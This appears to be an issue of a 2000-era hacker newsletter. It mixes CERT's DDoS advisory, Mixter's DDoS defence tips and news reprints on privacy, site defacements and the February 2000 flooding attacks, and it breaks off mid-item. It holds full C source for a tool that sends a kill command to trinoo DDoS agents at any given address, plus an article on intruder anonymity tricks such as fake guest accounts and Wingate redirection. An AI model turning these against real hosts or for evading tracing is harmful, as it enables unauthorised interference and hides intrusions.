U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message. Copyright 1999 Carnegie Mellon University. Conditions for use, disclaimers, and sponsorship information can be found in http://www.cert.org/legal_stuff.html * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. Revision History December 28, 1999: Initial release December 28, 1999: Added information regarding a patch from Apple -=- CERT: CERT® Advisory CA-2000-01 Denial-of-Service Developments This advisory is being published jointly by the CERT Coordination Center and the Federal Computer Incident Response Capability (FedCIRC). Original release date: January 3, 2000 Source: CERT/CC and FedCIRC A complete revision history is at the end of this file. Systems Affected All systems connected to the Internet can be affected by denial-of-service attacks. I. Description Continued Reports of Denial-of-Service Problems We continue to receive reports of new developments in denial-of-service tools. This advisory provides pointers to documents discussing some of the more recent attacks and methods to detect some of the tools currently in use. Many of the denial-of-service tools currently in use depend on the ability of an intruder to compromise systems first. That is, intruders exploit known vulnerabilities to gain access to systems, which they then use to launch further attacks. For information on how to protect your systems, see the solution section below. Security is a community effort that requires diligence and cooperation from all sites on the Internet. Recent Denial-of-Service Tools and Developments One recent report can be found in CERT Advisory CA-99-17. A distributed denial-of-service tool called "Stacheldraht" has been discovered on multiple compromised hosts at several organizations. In addition, one organization reported what appears to be more than 100 different connections to various Stacheldraht agents. At the present time, we have not been able to confirm that these are connections to Stacheldraht agents, though they are consistent with an analysis provided by Dave Dittrich of the University of Washington, available at http://staff.washington.edu/dittrich/misc/stacheldraht.analysis Also, Randy Marchany of Virginia Tech released an analysis of a TFN-like toolkit, available at http://www.sans.org/y2k/TFN_toolkit.htm The ISS X-Force Security Research Team published information about trin00 and TFN in their December 7 Advisory, available at http://xforce.iss.net/alerts/advise40.php3 A general discussion of denial-of-service attacks can be found in a CERT/CC Tech Tip available at http://www.cert.org/tech_tips/denial_of_service.html II. Impact Denial-of-service attacks can severely limit the ability of an organization to conduct normal business on the Internet. III. Solution Solutions to this problem fall into a variety of categories. Awareness We urge all sites on the Internet to be aware of the problems presented by denial-of-service attacks. In particular, keep the following points in mind: Security on the Internet is a community effort. Your security depends on the overall security of the Internet in general. Likewise, your security (or lack thereof) can cause serious harm to others, even if intruders do no direct harm to your organization. Similarly, machines that are not part of centralized computing facilities and that may be managed by novice or part-time system administrators or may be unmanaged, can be used by intruders to inflict harm on others, even if those systems have no strategic value to your organization. Systems used by intruders to execute denial-of-service attacks are often compromised via well-known vulnerabilities. Keep up-to-date with patches and workarounds on all systems. Intruders often use source-address spoofing to conceal their location when executing denial-of-service attacks. We urge all sites to implement ingress filtering to reduce source address spoofing on as many routers as possible. For more information, see RFC2267. Because your security is dependent on the overall security of the Internet, we urge you to consider the effects of an extended network or system outage and make appropriate contingency plans where possible. Responding to a denial-of-service attack may require the cooperation of multiple parties. We urge all sites to develop the relationships and capabilities described in the results of our recent workshop before you are a victim of a distributed denial-of-service attack. This document is available at http://www.cert.org/reports/dsit_workshop.pdf Detection A variety of tools are available to detect, eliminate, and analyze distributed denial-of-service tools that may be installed on your network. The National Infrastructure Protection Center has recently announced a tool to detect trin00 and TFN on some systems. For more information, see http://www.fbi.gov/nipc/trinoo.htm Part of the analysis done by Dave Dittrich includes a Perl script named gag which can be used to detect stacheldraht agents running on your local network. See Appendix A of that analysis for more information. Internet Security Systems released updates to some of their tools to aid sites in detecting trin00 and TFN. For more information, see http://www.iss.net/cgi-bin/dbt-display.exe/db_data/press_rel/release/1 22899199.plt Prevention We urge all sites to follow sound security practices on all Internet-connected systems. For helpful information, please see http://www.cert.org/security-improvement http://www.sans.org Response For information on responding to intrusions when they do occur, please see http://www.cert.org/nav/recovering.html http://www.sans.org/newlook/publications/incident_handling.htm The United States Federal Bureau of Investigation is conducting criminal investigations involving TFN where systems appears to have been compromised. U.S. recipients are encouraged to contact their local FBI Office. We thank Dave Dittrich of the University of Washington, Randy Marchany of Virginia Tech, Internet Security systems, UUNet, the Y2K-ICC, the National Infrastructure Protection Center, Alan Paller and Steve Northcutt of The SANS Institute, The MITRE Corporation, Jeff Schiller of The Massachusetts Institute of Technology, Jim Ellis of Sun Microsystems, Vern Paxson of Lawrence Berkeley National Lab, and Richard Forno of Network Solutions. This document is available from: http://www.cert.org/advisories/CA-2000-01.html CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT® Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message. Copyright 2000 Carnegie Mellon University. Conditions for use, disclaimers, and sponsorship information can be found in http://www.cert.org/legal_stuff.html * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. @HWA 116.0 Trinoo Killer Source Code ~~~~~~~~~~~~~~~~~~~~~~~~~ Source: PSS http://packetstorm.securify.com/ /* * AFRO-PRODUCTIONS.COM * * By your buddies at afro productions! * * This program kills trino nodes on version 1.07b2+f3 and below. * * */ #include <stdlib.h> #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/inet.h> #define KILL "d1e l44adsl d1e\n" int main(int argc, char **argv) { int sock; struct sockaddr_in s; struct hostent *h; char *host; if (argc == 1) { fprintf(stdout,"Usage: %s <ip>\n",argv[0]); return 0; } host = argv[1]; sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); s.sin_family = AF_INET; s.sin_addr.s_addr = inet_addr(host); s.sin_port = htons(27444); if (s.sin_addr.s_addr == -1) { h = gethostbyname(host); if (!h) { fprintf(stdout,"%s is an invalid target.\n",host); return 0; } memcpy(&s.sin_addr.s_addr,h->h_addr,h->h_length); } sendto(sock,KILL,strlen(KILL),0,(struct sockaddr *)&s,sizeof(s)); fprintf(stdout,"Packet sent to target %s.\n",host); return 1; } @HWA 117.0 Mixter's guide to defending against DDoS attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -----BEGIN PGP SIGNED MESSAGE----- 10 Proposed 'first-aid' security measures against Distributed Denial Of Service attacks ----------------------------------------------- To say the least, coping with all the causes and security vulnerabilities that can be exploited for compromising hosts and launching Denial Of Service from them is very complex. In the long term, there is no simple, single method for protecting against such attacks; instead, extensive security and protection measures will have to be applied. For everyone whose systems are currently at risk, or who is generally worried, I am compiling a small list of easy and fast to implement methods to protect against those attacks. - Mixter Important things to do as a current or potential victim of packet flooding Denial Of Service: 1) Avoid FUD FUD stands for fear, uncertanity, and doubt. The recent attacks have obviously been launched with provocating hysteria and overreactions in mind, due to the victims that have been targeted. It is very important to realize, that only a small amount of companies and hosts do have to fear becoming a victim of Denial Of Services. Those include top-profile sites like search engines, the most popular e-commerce and stock companies, IRC chat servers, as well as news magazines (for obvious purposes). If you are not amongst them, there is little reason for you to worry about becoming a direct target of DoS attacks. 2) Arrange with your Internet uplink provider(s) It is very important that you have the assistance and cooperation from your direct backbone and uplink network providers. The bandwidth used in DDoS attacks is so major, that your own network probably cannot handle it, regardless of what you try. Talk to your uplinks, and make sure that they agree to helping you with implementing routing access control that limits the amount bandwidth and different source addresses that are let through to your network at once. Ideally, your uplink should be willing to monitor or let you access their routers in the case of an actual attack. 3) Optimize your routing and network structure If you don't have only a host, but a bigger network, then tune your routers to minimize the impact of DoS attacks. To prevent SYN flooding attacks, set up the TCP interception feature. Details about this can be found at http://www.cisco.com or at your router manufacturer's hotline. Block the kinds of UDP and ICMP messages that your network doesn't require to operate. Especially permitting outgoing ICMP unreach messages could multiply the impact of a packet flooding attack. 4) Optimize your most important publically accessible hosts Do the same on the hosts that can be potential targets. Deny all traffic that isn't explicitly needed for the servers you run. Additionally, multi-homing (assigning many different IPs to the same hostname), will make it a lot harder for the attacker. I suggest that you multi-home your web site to many physically different machines, while the HTML index site on those machines may only contain a forwarding entry to the pages on your actual, original web server. 5) During ongoing attacks: start countermeasures as soon as possible It is important that you start the backtracking of packets as soon as possible, and contact any further uplink providers, when traces indicate that the packet storm came over their networks. Don't rely on the source addresses, as they can be practically be chosen arbitrarily in DoS attacks. The overall effort of being able to determine origins of spoofed DoS attacks depends on your quick action, as the router entries that allow traffic backtracking will expire a short time after the flood is halted. Important things to do as a current or potential victim of security compromise, break-in, and flood agent installation. 6) Avoid FUD As a potential victim of a compromise, you should as well try not to overreact, instead take rational and effective actions fast. Note that the current Denial Of Service Servers have only proven to be written for and installed on Linux and Solaris systems. They are probably portable to *BSD* systems, but since those are usually more secure, it should not be a big problem. 7) Assure that your hosts are not compromised and secure There are many recent vulnerability exploits, and a lot more of older exploits out. Check exploit databses, for example at securityfocus.com, or packetstorm.securify.com, to make sure that the versions of your server software are not proven to be vulnerable. Remember, intruders HAVE TO use existent vulnerabilities to be able to get into your systems and install their programs. You should be reviewing your server configuration, looking for security glitches, running recently updated software versions, and, this is most important, be running the minimum of services that you really need. If you follow all of these guidelines, you can consider yourself to be secure and protected from compromises to a reasonable extent. 8) Audit your systems regularly Realize that you are responsible for your own systems, and for what is happening with them. Learn sufficiently enough about how your system and your server software operates, and review your configuration and the security measures that you apply frequently. Check full disclosure security sites for new vulnerabilities and weaknesses that might be discovered in the future in your operating system and server software. 9) Use cryptographic checking On a system, on which you have verified that it has not already been broken into, or compromised, you are urged to set up a system that generates cryptographic signatures of all your binary and other trusted system files, and compare the changes to those files periodically. Additionally, using a system where you store the actual checksums on a different machine or removable media, to which a remote attacker cannot have access, is strongly recommended. Tools that do this, e.g. tripwire, can be found on security sites, like packetstorm.securify.com, and most public open source ftp archives. Commercial packages are also available, if you prefer them. 10) During ongoing attacks: shut down your systems immediately and investigate If you detect an attack emerging from your networks or hosts, or if you are being contacted because of this, you must immediately shut down your systems, or at least disconnect any of the systems from any network. If such attacks are being run on your hosts, it means that the attacker has almost-full control of the machines. They should be analyzed, and then reinstalled. You are also encouraged to contact security organisations, or emergency response teams. CERT (www.cert.org) or SANS (www.sans.org) are some places where you can always request assistance after a compromise. Also keep in mind, that providing these organisations the data from your compromised machine(s) left by the attacker is important, because it will help them tracking down the origin of the attacks. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.1 iQEVAwUBOKQY5rdkBvUb0vPhAQHkyQf9GQlwQWfJTy3QSXobwijbF+fpuUt5TOwS 6kz8JkdMpCz3hyrVNSuixvR9Z7RTfriHTn6Mk6j2EtXBtcvqkxZfP6Gh4k+PlnLK YYF0fCgT9tK62SqOrZS1fvSSDGS+s/k6hys2tb3vrVhkappTi8eynihLe6v6BnL2 /cAuck4ACGruaLxqwMJu16tY83OsiTV/StAVPivQpaBz1KeWN4MxJc568/Y/wUsx xfwjgncNflYCsMnGEMaVuPYeaPkeNXBn2NtwTKN3EVcga4/BgqVo1VrfxBinBNEt AZBpMk16Gql82BmXTaFuLnYxJ7TLiHZVhiq6l6DYwws+MjpjT5IiDw== =g2Lj -----END PGP SIGNATURE----- @HWA 118.0 HNN: Feb 9th; Court Authorizes Home Computer Search ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Mike Northwest Airlines has received permission from a Federal Court to search the home computers of a dozen flight attendants. The search would look for evidence, incriminating emails or other documents. It is believed that the employees helped to organize a sickout at the airline. The search is currently on hold pending a possible settlement of the airline's lawsuit against the flight attendants union. Scary quote of the day: "Business speech is not subject to the same protections as political speech, You can't say whatever you want about a company." - John Roberts, Minneapolis Attorney The Star Tribune http://www.startribune.com/viewers/qview/cgi/qview.cgi?template=biz_a_cache&slug=priv0208 Court authorizes search of Northwest employees' home computers Eric Wieffering and Tony Kennedy Star Tribune Tuesday, February 8, 2000 Northwest Airlines last week began court-authorized searches of the home computers of between 10 and 20 flight attendants, looking for private e-mail and other evidence that the employees helped to organize a sickout at the airline over the New Year's holiday. The search has since been suspended pending a temporary settlement of the airline's lawsuit against Teamsters Local 2000, the union representing 11,000 flight attendants. But privacy advocates and attorneys not involved with the case say Northwest's action may embolden other companies to more aggressively monitor what employees say and do online from their home computers. "If Northwest succeeds in gaining access to the hard drives of the home computers of its employees, it will certainly put a chill on the uses employees everywhere make of their home computers," said Beth Givens, director of the Privacy Rights Clearinghouse in San Diego. Northwest's action comes at a time when bills to protect individual privacy have been introduced at the state and national level. In addition, an increasing number of employees are learning, to their dismay, that companies have the right to monitor their online activities at work. Last month, for example, the New York Times fired 23 employees for sharing bawdy e-mail messages. Northwest defended the search, noting that a federal court had authorized it. "In the age we live in, the normal course of discovery includes taking depositions, producing documents and these days more than ever looking into the content of computers," said Jon Austin, a spokesman for Northwest. "So many documents and communications these days are purely electronic in nature," Austin said. But companies have rarely sought to search the home computers of their employees. In the past, most such searches usually have been limited to cases involving workers who've been accused of stealing company files, passing on trade secrets to competitors or using insider information to profit on the trading of company stock. Nor is all speech on the Internet protected by the First Amendment. Increasingly, courts have been willing to help companies crack down on so-called "cybersmearing" -- bad-mouthing companies or their management online. "Business speech is not subject to the same protections as political speech," said John Roberts, a Minneapolis attorney who specializes in cyberlaw. "You can't say whatever you want about a company." The get-tough strategy is a new one for Northwest, too. In the spring of 1998, the company's mechanics, frustrated by the pace of contract negotiations, began an unauthorized work slowdown that forced flight delays and hundreds of cancellations. Union leaders disclaimed any knowledge or authorization of the campaign, which employees advocated on Web sites and message boards. Last month, however, Northwest sued the flight attendants union and some of its members, alleging they had violated federal labor laws by orchestrating a sickout. Judge Frank agreed with Northwest and issued a temporary restraining order that prohibited the union from advocating any work disruptions. New legal ground Still, the Northwest case appears to break new ground because, in addition to searching the office computers of union officials, Northwest got permission to search their home computers and the home computers of several rank-and-file employees, including Kevin Griffin and Ted Reeve. The temporary settlement in the suit does not apply to Griffin and Reeve. The judge agreed to put the suit on hold as it pertains to the union and 19 individuals who are represented by the union's attorneys. But Griffin and Reeve, who are not represented by union attorneys because they are not union officers, are still subject to the company's discovery efforts and to a possible injunction against them. "This kind of precedent could have a very chilling effect on the exercise of speech rights, and could set a very bad precedent for privacy," said Jerry Berman, executive director for the Center for Democracy and Technology, a leading privacy rights organization based in Washington, D.C. Like most flight attendants, Griffin and Reeve do not use a computer at work. But they do operate online message boards where flight attendants have vented their frustration toward the company and the union leadership. Griffin's message board, http://www.nwaflightattendants.com, included anonymous postings calling for a sickout, but they were usually followed by urgings from Griffin that participants not advocate illegal activities. Northwest hired two computer forensic experts from Ernst & Young to copy the hard drives of the 21 individuals named in the lawsuit. The judge limited the search to union activities relating to the sickout or e-mail to 43 individuals, well beyond the number of people named in the original lawsuit. "This is really an extension beyond established law," said Marshall Tanick, a Minneapolis attorney who specializes in workplace and privacy issues. "How different is this from wiretapping somebody's phone?" Personal data Barbara Harvey, a Detroit-based attorney representing Griffin and Reeve, said the situation has created tremendous anxiety about the possible loss of "highly personal" information. "We are trusting them [Ernst & Young] totally. We don't know them. We didn't hire them. In fact, they were hired by Northwest. But we are put into the position of having to trust them," she said. Griffin, a veteran Northwest flight attendant based in Honolulu, surrendered his Packard Bell desktop and Fujitsu laptop at the Ernst & Young office in Honolulu. He was met there by two forensic examiners who flew to Honolulu from Washington, D.C., and Texas. "I didn't think they had the right to come and get your home computer," he said. The threat of a court-authorized search of home computers has already had one measurable impact: Postings to a rank-and-file Web site that was openly critical of both union management and the company have slowed to a trickle. "If you're Northwest Airlines, you're probably smiling about that," said Paul Levy, a lawyer for Ralph Nader's Public Citizen Litigation Group, which also represents Griffin and Reeve. Northwest might not be the only party pleased to see the Web site go quiet. Griffin's Web site and an organized e-mail campaign were instrumental in rallying opposition that defeated a tentative contract agreement that was reached last June and endorsed by the union's top leaders, including Teamsters General President James Hoffa. Asked why the union didn't fight harder against the effort to search employees' home computers, Billie Davenport, president of Teamsters Local 2000, said the union complied with the discovery request because it felt it had nothing to hide. 'Was enough protection' "We had voiced concern over people's privacy. There was an invasion-of-privacy issue," Davenport said. "But we believe there was enough privacy protection." She said Ernst & Young's computer forensic examiners spent two full days in the union's offices last week, copying hard drives. Griffin said his Web site has had more traffic than ever in the past month, but far fewer postings from visitors. Of those who aren't afraid to comment in the open forum section of the Web site, a much smaller percentage of the writers are identifying themselves, Griffin said. "It's like they are running scared, with good reason," Griffin said. @HWA 119.0 HNN: Feb 9th; MPAA Makes Deceptive Demands ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lance Link Not content with restraining orders against named defendants obtained through lawsuits filed by the DVDCCA and the "big 8" the MPAA has now started sending its own cease-and desist letters to people who aren't even covered by the court rulings. Peter Junger, a law professor at Case Western University, picks apart an MPAA letter sent to John Young, maintainer of the superb cryptome.org archives. MPAA Letter http://cryptome.org/dvd-mpaa-ccd.htm Junger's Analysis http://www.cs.ucl.ac.uk/staff/I.Brown/archives/ukcrypto/1199-0100/msg00639.html @HWA 120.0 HNN: Feb 9th; Medical Sites Give Out Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne Researchers at the Health Privacy Project at Georgetown University have released a study that shows that most medical web sites share surfers collected data with other companies. These web sites have privacy policies clearly posted however the sites are not following their own policies. Fairfax IT http://it.fairfax.com.au/e-commerce/20000208/A4140-2000Feb7.html Fears for security on medical websites Tuesday 8 February 2000 MEDICAL Web sites say they protect the privacy of visitors but often share the information they collect with other companies, a new study has found. That means a visitor seeking information on, say, erectile dysfunction might unknowingly be alerting online marketers to his condition. "We found that almost across the board, the privacy practices did not match the policies," said Janlori Goldman of the Health Privacy Project at Georgetown University, who conducted the research that went into the report released at an e-Health ethics summit of large online health information providers. The 21 leading health sites reviewed appeared to understand the depth of consumer concerns about privacy, Goldman said, noting that they prominently sported privacy policies. But the companies weren't following through, he said. "They're giving people a false sense of confidence and a false sense of trust." Consumers are turning to the Internet for medical information in record numbers, but a recent survey shows that privacy remains a strong concern. The poll, conducted for the California HealthCare Foundation, found that 75 per cent of people were concerned about health websites passing on personal data without permission and 17 per cent said they didn't go online for such information because of privacy concerns. The report compared consumer health care sites on the Internet to gawky adolescents - with plenty of abilities but little self-control. WASHINGTON POST @HWA 121.0 HNN: Feb 9th;FTC Investigates Amazon Subsidiary on use of Customer Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by janoVd The Federal Trade Commission has begun an investigation into Alexa Internet, a subsidiary of Amazon.com, concerning the companies use of the private customer data. Alexa Internet and its software tracks where users go on the World Wide Web to provide related Web links and other data. The informal FTC investigation into Alexa has come after charges that companies software secretly intercepts personal data and sends that information to third parties, including Alexa's parent company, Amazon.com. Associated Press - via Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500165488-500210086-500972125-0,00.html Amazon.com subsidiary target of FTC probe, two lawsuits Copyright © 2000 Nando Media Copyright © 2000 Associated Press By MICHAEL J. MARTINEZ SEATTLE (February 9, 2000 1:51 a.m. EST http://www.nandotimes.com) - Alexa Internet, a subsidiary of online retail giant Amazon.com, and its software are the subject of an "informal" investigation by the Federal Trade Commission, according to a document filed this week with the U.S. Securities and Exchange Commission. Amazon.com Inc. also said a pair of lawsuits filed against Alexa over use of private customer data are without merit. Alexa's software, which is downloaded and installed on Web browsers like Netscape's Navigator and Microsoft's Internet Explorer, tracks where users go on the World Wide Web in order to provide related Web links and other data. The two lawsuits mentioned in the SEC filing made Monday allege that Alexa's software secretly intercepts personal data and sends that information to third parties, including Alexa's parent company, Amazon.com. "We are cooperating completely with the FTC on an informal, voluntary basis," said Alexa spokeswoman Dia Cheney. "As for the lawsuits, we believe the claims have no merit." The FTC would not comment on its investigation. Computer security consultant Richard Smith, who found the possible privacy problems in Alexa's software, said the privacy concern is in the way Alexa tracks Web pages in order to provide related links. The system records the entire address of each Web page. On some Web sites, those addresses could contain customer data. "Some (Web addresses) may contain personal information such as mailing addresses or customer account numbers," the Brookline, Mass.-based Smith said. "It's conceivable that someone like Alexa could tie it all together with your surfing patterns and create a profile." The lawsuits allege that the San Francisco-based Alexa is doing that - combining information gleaned from Web addresses with Amazon.com's customer accounts. Both companies deny the accusations. Alexa would not identify where the suits were filed. Cheney noted that Web usage patterns and customers' data are stored in separate databases and are not linked. Both Amazon and Alexa said Tuesday that personal data that Alexa gathers remains on Alexa's databases and is not made available to Amazon. Amazon.com has a service it calls "zBubbles," which offers Alexa users the ability to buy certain products based on Internet sites they visit. For example, someone visiting a site about a handheld computer might click on a zBubble to get more information on how to buy the device from Amazon. However, the zBubbles do not access Amazon.com accounts or take such information from the users' computer, according to the company. "This is not transactional information," said Amazon spokesman Bill Curry. "This is a service that Alexa has on its product. It doesn't funnel into us." @HWA 122.0 HNN: Feb 9th; Sys Admins Possibly At Fault in Japanese Defacements ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles Japanese officials are digging deeper into the investigation of the recent defacements of several government web sites. Observers have asked the question of whether the system administrators lived up to their obligations as operators of Web site servers. Daily Yomiuri http://www.yomiuri.co.jp/newse/0208cr21.htm Sites hacked with IDs, passwords Akiko Kasamaand Masato Takahashi Yomiuri Shimbun Staff Writers The hackers behind a recent series of invasions of government-run Web sites may have gained access to the sites by stealing the user names and passwords belonging to the engineers operating the systems, according to investigation sources. The hackers may have replaced the user names and passwords with new ones after illegally entering computer servers that operate the Web sites. The hackers are also suspected of erasing communications records--known as logs--in an attempt to remove information that could help trace them. Currently, specialists and investigators are trying to work out how hackers gained access to the Web site servers. The sites broken into include those run by the Science and Technology Agency and the National Institute for Research and Advancement (NIRA), an affiliate of the Economic Planning Agency. The computer servers were running under two kinds of operating systems. Investigators are increasingly convinced that the engineers managing the systems failed to properly set up the servers when they entered their user information into the systems. Observers question whether the system managers lived up to their obligations as operators of Web site servers. System managers are in charge of running and overseeing information systems and computer networks at companies and government offices. Their status is almost godlike regarding computer security. They issue user names to other users, have the authority to decide the framework of each organization's computer security system and are able to erase logs that record the sender, time and place of origin of messages. After the Science and Technology Agency Web site was broken into on Jan. 24 and 26, access to the site was tested using the user name and password of the official system manager. The site, however, could not be accessed as the user name and password were not recognized after a hacker had created a new password. After the NIRA site was broken into on Jan. 26, officials found that the hacker had impersonated a system manager using a user name and password of the hacker's own invention, as the site had not been set up to recognize only the system manager's user name and password. The logs--the only means of tracing the hacker--were erased under the name of system managers on both sites. Hackers broke into two kinds of operating systems in the recent cases. They usually use special hacking software to scout out bugs left during programming on the operating system and the software for creating Web sites. They then input specific commands to obtain user names and passwords. Hackers in the recent cases might have obtained user names and passwords through uncorrected bugs. Nonetheless, the NIRA site case shows that hackers did not hesitate to take advantage of slack site management, the sources said. Hacking into a system to obtain a user name and password involves searching for an unlocked port. Portscanning is a hacking tool that does this automatically. Portscanning was used in more than 12,000 intrusions into the National Personnel Authority and the authority's Kinki regional office sites, which stores government employee exam information. The deleted logs make tracing the hackers in the recent cases difficult. Also, as hackers usually use a number of servers to try to invade a targeted site, tracing failed hacking attempts does not help much in identifying the Web site trespassers. If hacking routes cross national boundaries, jurisdiction and national interest issues also come into play. Although investigators traced illegal entries to the sites of The Asahi Shimbun and The Mainichi Shimbun to a South Korean provider, they were unable to get any further leads. The series of hacking cases has prompted several Internet security companies to begin offering instruction on security measures and to put antihacking goods on the market. Asgent Inc., a security software company based in Chuo Ward, Tokyo, will hold a free seminar on Feb. 16 and 17 targeting company computer system managers and focusing on the skills needed to prevent hacking and transform the contents of hacked Web sites. For more information, call the Asgent at (03)5643-2561. The Japanese unit of Network Associates Inc., based in Minato Ward, Tokyo, has started distributing free samples of CyberCop Monitor, its software for detecting illegal Web site access in real time. The samples will be sent out for free until the end of March to those who complete the application form on the company's Web site at http://www.nai.com/japan. @HWA 123.0 HNN: Feb 9th; Anonymity and Tracking of the Malicious Intruder ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Apocalyse Dow Malicious intruders still use temporary guest accounts, unrestricted proxy servers, buggy Wingate servers, and anonymous accounts to roam unfettered through the internet. One would think that some of these old holes would be patched by now. InfoWorld http://www.idg.net/go.cgi?id=221983 January 18, 1999 Tricks of the trade obscure hacker tracks and make anonymity easily attainable Ever wonder how hackers can spend so much time online and rarely get caught? After all, everything they do on the Internet should be logged, right? Web hits, FTP sessions, Telnet connections, newsgroup postings, burps, and coughs should all be traceable, right? Then how do they pillage and plunder with such ease? In the good old days, compromising university or government accounts and using them to bounce around the Internet was widespread. Hackers still use these techniques, but they cover their tracks. Temporary guest accounts, unrestricted proxy servers, buggy Wingate servers, and anonymous accounts can keep hackers carefree. Hackers can become invisible on the Internet by obtaining a test account from an ISP. A hacker can call a small ISP, profess interest, and open a guest account for a couple of weeks by giving false information. Then, using Telnet, the unwanted guest can connect to any other compromised account. University computers are notorious for their easy accessibility to the public. Hackers can take advantage of the lack of monitoring to store the majority of their scripts and tools on the university system. And many universities give out free shell or Internet accounts to "students" supplying little more than a valid name and student registration number. From there they can exploit old Wingate servers (www.wingate.com) that allow Telnet redirection by default. Discovered in early 1998, this bug permits unfettered Telnet access to anyone on the Internet through a Wingate proxy server. The bug has been fixed, but many sites have not yet applied the fix. Scanning a list of Wingate servers discovered at a popular hacker Web site, we found at least five (out of 127) machines still vulnerable to this bug. If you use Wingate, be sure to download Version 3.0, which fixes this and other problems. Anonymous surfing Proxy servers let small organizations protect their internal systems. But an improperly configured system can be vulnerable. Be sure to scan the external interface of your proxy servers. Check for open ports, especially ports 80 (unless you are Web publishing), 3128, 8080, and 10080. Out of 282 systems we scanned, more than one half (151) provide proxy services to the world. All Internet users have to do is change proxy settings in their Web browsers to an available proxy server, and it's clear sailing. Some Web sites offer free anonymous Web surfing, which is a boon for all of us privacy paranoids out there, but a nightmare for law enforcement. Both CyberArmy (www.cyberarmy.com) and Anonymizer (www.anonymizer.com) offer free, albeit slow, anonymous Web surfing. Connecting to a Web page through their free services will mask your identity. Connecting through Anonymizer's ISP you get the following identity: Connect from sol.infonex.com [209.75.196.2] (Mozilla /4.5 [en] (TuringOS; Turing Machine; 0.0))logged. And from CyberArmy's redirector server you get this identity: Connect from s214-50.9natmp [216.22.214.50] (Mozilla/4.01 (compatible; NORAD National Defence Network))logged. TuringOS and NORAD National Defence are spoofed origins that mask the originating system. Lucent also has a proxy server meant to protect your privacy (www.lpwa.com). Like the others, the Lucent Personalized Web Assistant can make you anonymous by tunneling all of your Web traffic through its proxy server. The only difference with Lucent is you must provide your e-mail address to sign in. Anonymous service providers such as Anonymizer and Lucent have the right intentions -- protecting your privacy -- but like any umbrella they can be abused. Services such as these can be a hacker's dream. Anonymizer offers Internet security and privacy for corporate customers and individuals, and effectively makes them invisible. They don't store cookies, they block Java and JavaScript access, and they remove all identifier strings. To its credit, Anonymizer severely limits to whom they give shell accounts. But at $7 a month, anyone with a good story should be able to obtain one. They keep logs for 48 hours but don't record the source IP address. To guard against abuse, Anonymizer will shut down service to a particular Web site if abuse is reported. But with no source IP logging, it must shut down service to that site for all customers. Privacy cheerleading Don't get us wrong, we are the first to jump on the privacy bandwagon whenever it rolls by, but at what cost? Even if all of the software bugs contributing to anonymous connections are fixed, more and more ISPs will inevitably offer anonymous connectivity. How will you defend your site against the possible onslaught of phantom hack attempts? Will logged IP addresses quickly turn into ghosts offering little more than a place to begin? Let us know at security_watch@infoworld.com. @HWA 124.0 HNN; Feb 10th; E-Trade, LA Times, Datek, ZD-Net Join List of Sites ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue Web Sites around the net are bracing for more attacks today as such major companies as E-Trade, LA Times, Datek, and ZD-Net recover from massive denial of service attacks. There are lots of rumors flying around the net right now. Some are pretty far fetched but others are more believable. One such rumor is it that the packets that have been used to flood at least one of sites may have contained content: A source close to HNN says the content includes "Various references to Mixter, greets to hacker groups, etc. Several references to the Internet becoming a "whorehouse of E-commerce". Of course at this time none of this is confirmed. Law enforcement agencies are working over time attempting to track down the perpetrator(s). Some sources indicate that they may be close to an 